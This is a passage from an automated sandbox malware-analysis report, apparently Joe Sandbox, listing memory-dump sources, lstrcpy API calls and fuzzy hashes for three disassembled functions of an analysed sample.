                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 15b729f529077d386d5eb46dde74f12bdf6756a017c5f7a573a0a6407d2ad214
                                  • Instruction ID: 328aca82ae8ace9643b9721fa536d022d89a3789faac9e051e73b28eee9088f7
                                  • Opcode Fuzzy Hash: 15b729f529077d386d5eb46dde74f12bdf6756a017c5f7a573a0a6407d2ad214
                                  • Instruction Fuzzy Hash: 3D8113B0E002059BDB12CF95DC44BAFBBB5EF85300F16C069E909AB385EB759D45CB94
                                  Function 00341530 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00341610: lstrcpy.KERNEL32(00000000), ref: 0034162D
                                    • Part of subcall function 00341610: lstrcpy.KERNEL32(00000000,?), ref: 0034164F
                                    • Part of subcall function 00341610: lstrcpy.KERNEL32(00000000,?), ref: 00341671
                                    • Part of subcall function 00341610: lstrcpy.KERNEL32(00000000,?), ref: 00341693
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341557
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341579
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034159B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003415FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 12042e2e709536f19e906e5a2f7ae0564a27594221131d0f01bfa09f6cfcaab5
                                  • Instruction ID: e7c433a91a119da2ee28c42807b78fef3556dca41eb8b82d8ce732d0d70bb76d
                                  • Opcode Fuzzy Hash: 12042e2e709536f19e906e5a2f7ae0564a27594221131d0f01bfa09f6cfcaab5
                                  • Instruction Fuzzy Hash: A331D475A01F02AFC725DF3AD588952BBE5FF89300741492DA896CBB10DB34F861CB90
                                  Function 00361570 Relevance: 5.1, APIs: 4, Instructions: 81stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 003615A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003615D9
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00361611
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00361649
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: a0aad73b00ebf559626d9dead3e02f8d06467dbd3d3c7369e57e8982f2491f46
                                  • Instruction ID: a7169b71016f9313189d3146718237413a341cb719cadcb9551d98634f8d8b4c
                                  • Opcode Fuzzy Hash: a0aad73b00ebf559626d9dead3e02f8d06467dbd3d3c7369e57e8982f2491f46
                                  • Instruction Fuzzy Hash: 8521FC74601B029FD726DF2AD854A17B7F5AF45700B49891CA897CBB44DB30F851CBA0
                                  Function 00341610 Relevance: 5.1, APIs: 4, Instructions: 57stringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 0034162D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034164F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341671
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341693
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 74d0bc7dd80d5b2541f821412ed9fe14089ec4ac1f5ebdda5f8ed7cc9aa293c2
                                  • Instruction ID: 51aa58898a8a1968612bebca1fb72d2b34fd6824948f872ea397d0b22a45e7f5
                                  • Opcode Fuzzy Hash: 74d0bc7dd80d5b2541f821412ed9fe14089ec4ac1f5ebdda5f8ed7cc9aa293c2
                                  • Instruction Fuzzy Hash: 61113374A11B039BD7259F35D90C927B7F8FF44301749052DA896CBA40EB34F891CB60